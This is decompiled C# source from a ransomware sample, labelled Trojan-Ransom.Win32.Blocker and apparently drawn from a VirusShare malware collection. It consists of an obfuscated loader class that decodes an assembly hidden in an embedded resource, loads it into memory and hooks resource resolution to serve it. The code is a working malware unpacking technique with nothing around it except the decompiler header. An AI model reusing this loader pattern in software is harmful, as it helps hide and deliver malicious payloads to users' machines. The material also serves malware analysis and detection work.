// Decompiled with JetBrains decompiler // Type: A.cb7b65dbb5581eaee2bd1292ca8df7359 // Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe using System; using System.Reflection; namespace A { internal class cb7b65dbb5581eaee2bd1292ca8df7359 { private static readonly Assembly cf3729dbae694133f2c23fdc1ca4d7914; static cb7b65dbb5581eaee2bd1292ca8df7359() { if ((object) cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 != null) return; Assembly executingAssembly = Assembly.GetExecutingAssembly(); string name = executingAssembly.GetName().Name; foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames()) { if (name == manifestResourceName) { cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 = Assembly.Load(c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(name))); break; } } } internal static void ced5cd5d8a5c50a5a5aa8329c9369c6b7() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(cb7b65dbb5581eaee2bd1292ca8df7359.c0e352055baf8810250e1c622207b6459); private static Assembly c0e352055baf8810250e1c622207b6459( object c5669828436342a69e25de42ecd6cb771, ResolveEventArgs c01306e5de7acf5afd10f9b0df1fe65dd) { if ((object) cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 == null) return cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914; foreach (string manifestResourceName in cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914.GetManifestResourceNames()) { if (manifestResourceName == c01306e5de7acf5afd10f9b0df1fe65dd.Name) return cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914; } return (Assembly) null; } } }